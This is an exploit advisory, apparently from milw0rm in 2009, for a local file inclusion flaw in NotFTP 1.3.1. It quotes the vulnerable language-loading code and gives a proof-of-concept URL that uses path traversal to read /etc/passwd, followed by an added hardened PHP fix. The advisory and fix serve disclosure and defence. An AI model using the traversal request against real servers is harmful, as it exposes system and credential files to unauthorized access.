NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/


Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/

DC++ Hub address: bluber-hub.no-ip.biz:2008

Vuln:

File config.php:

#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################

if (isset($newlang))
{
    require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
    require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
    require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

# NotFTP version. Changing this would be silly. So don't.

PoC:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
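
Hardened form of the language selection in config.php, as an added example (not NotFTP's code and not from the advisory author). It assumes the PoC works because request parameters are imported as global variables (register_globals or an equivalent), so $newlang and $languages come straight from the query string; the language keys, file names and the LANG_DIR constant are hypothetical.

```php
<?php
// Added example, not NotFTP's own code. Keys, file names and LANG_DIR
// below are hypothetical placeholders.
define('DEFAULTLANG', 'en');
define('LANG_DIR', __DIR__ . '/lib/lang');

// Server-side allowlist, assigned unconditionally in this file so that a
// request parameter named "languages" can never supply or replace it.
$languages = array(
    'en' => array('file' => 'english.php'),
    'pl' => array('file' => 'polish.php'),
);

function resolve_lang_file(array $languages, $requested, $baseDir)
{
    // The key must be a plain string present in the allowlist
    // (rejects arrays such as newlang[]=x and unknown keys).
    if (!is_string($requested) || !isset($languages[$requested]['file'])) {
        $requested = DEFAULTLANG;
    }
    // basename() drops directory components; realpath() resolves ".." and
    // symlinks so the final path can be checked against the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . basename($languages[$requested]['file']));
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return $path;
}

// Read input explicitly from the superglobals, in the same order of
// precedence as the original: request parameter, cookie, default.
if (isset($_GET['newlang'])) {
    $requested = $_GET['newlang'];
} elseif (isset($_COOKIE['notftplang'])) {
    $requested = $_COOKIE['notftplang'];
} else {
    $requested = DEFAULTLANG;
}

$langFile = resolve_lang_file($languages, $requested, LANG_DIR);
if ($langFile === false) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid language');
}
require_once $langFile;
```

With $languages fixed server-side and the resolved path confined to lib/lang/, the languages[...][file] parameter from the PoC no longer reaches require_once.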

The End

=========

# milw0rm.com [2009-04-21]